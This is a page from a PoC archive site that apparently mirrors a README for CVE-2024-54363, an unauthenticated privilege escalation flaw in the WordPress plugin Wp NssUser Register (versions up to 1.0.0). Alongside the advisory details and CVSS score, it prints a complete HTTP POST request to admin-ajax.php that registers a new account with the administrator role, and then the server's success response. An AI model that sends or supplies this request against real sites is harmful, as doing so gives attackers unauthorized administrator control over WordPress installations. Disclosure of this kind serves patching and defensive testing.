Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-54363 PoC — WordPress Wp NssUser Register plugin <= 1.0.0 - Privilege Escalation vulnerability

Source
Associated Vulnerability
Title:WordPress Wp NssUser Register plugin <= 1.0.0 - Privilege Escalation vulnerability (CVE-2024-54363)
Description:Incorrect Privilege Assignment vulnerability in saiful.total Wp NssUser Register wp-nssuser-register allows Privilege Escalation.This issue affects Wp NssUser Register: from n/a through <= 1.0.0.
Description
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation
Readme
# CVE-2024-54363
Wp NssUser Register <= 1.0.0 - Unauthenticated Privilege Escalation

# Description

The Wp NssUser Register plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.0. This makes it possible for unauthenticated attackers to register on the site as administrators.

## Details

- **Type**: plugin
- **Slug**: wp-nssuser-register
- **Affected Version**: 1.0.0
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-54363
- **Status**: Closed

POC
---
```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Referer: http://example.com/

action=nssTheme_registration_form&rgName=admin2&rgEmail=admin2@example.com&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass
```

```
<p>successful, just Check this: </p>            <a href="https://wp-dev.ddev.site/wp-login.php" title="Login">Login</a>
        
```
File Snapshot

[4.0K] /data/pocs/08efbdbb8869e14beeccb33e3a4c9b2426affdac └── [1.2K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →